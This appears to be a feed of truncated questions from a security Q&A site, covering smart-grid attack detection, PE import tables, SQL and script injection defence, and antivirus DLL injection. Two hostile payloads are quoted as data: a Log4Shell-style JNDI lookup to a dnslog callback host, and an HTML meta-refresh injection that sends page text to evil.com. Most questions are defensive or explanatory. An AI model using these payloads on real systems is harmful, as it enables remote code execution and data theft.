Collaborate Disseminate
I am doing a research on detecting Stealthy False Data Injection (SFDI) attacks in a smart grid context (a related paper). Besides I am working on a chaotic cryptography (e.g. with Lorenz attraction) for encryption and decryption of the tr… Continue reading Is it possible to detect Stealthy False Data Injection attack through chaotic cryptography? [migrated]
Some spammers keep filling each and every form-field with below:
${jndi:ldap://123.tgnndi.dnslog.cn/e}
Maybe the $ part is supposed to trigger JQuery.
What is this, is it a try to attack?
If so, is it targetting our JS frontend or our PHP… Continue reading Explain `${jndi:ldap://…}` spam(s)? [duplicate]
I understand the point of IAT/IDT/ INT and dynamically loaded DLLs at runtime. The OriginalFirstThunk in the Import Directory table refers to the function names stored (in the case of an ordinal) in the Import Lookup/Name table and in the … Continue reading OriginalFirstThunk in memory
Can anyone please explain me this:
First, we look at the last value of the Optional Header, Data
Directories, the Import Directory RVA value. This value gives us the
address of the Import table when the file is loaded into memory. For
exa… Continue reading IAT/IDT in memory PE file
I want to prevent SQL injection attacks in a rather abstract application. Therefore I want to escape all user provided input as described here. The other options provided on this page don’t fit in my scenario.
I couldn’t find the right pla… Continue reading How to do character escaping in PostgreSQL to prevent a SQL injection attack?
I know that most of the AV are injecting their own DLL in order to do userland API filtering, in functions such as WriteProcessMemory or CreateRemoteThread.
But how can they do that? Because from what I know, the AV dll is not in the proce… Continue reading How does the AV inject their own DLL in each new process?
I found an HTML injection vulnerability and I entered some random HTMLi payload to see what can I do further. For that, I give this payload:
<meta http-equiv="refresh" content=’0; url=http://evil.com/log.php?text=
After giving… Continue reading Server throws Null Pointer Exception error when trying html injection [closed]
We have a web service to provide dicom modality worklist operations. We have a security concern about sanitizing the user inputs (especially for attributes like Study Description, Requested Procedure Description etc.) to prevent script inj… Continue reading Validation of input in REST endpoint to prevent script injection?
The VBScript’s RegExp object used in Classic ASP allows one to set a pattern then execute it. If a user provides the search string, is it exploitable for IDS08-J / CWE-625 (Permissive Regex)? Or does the RegExp object sanitize input to … Continue reading Is VBScript RegExp object exploitable with a code injection or does it escape special characters?
Does anyone know what this JS code is doing? It keeps getting injected to most of my browser pages I visit. I have tried different browsers (Chrome/Edge), incognito mode, even disabling all extensions. But it keeps showing up randomly on s… Continue reading Weird JS code injected to most of my browser pages [closed]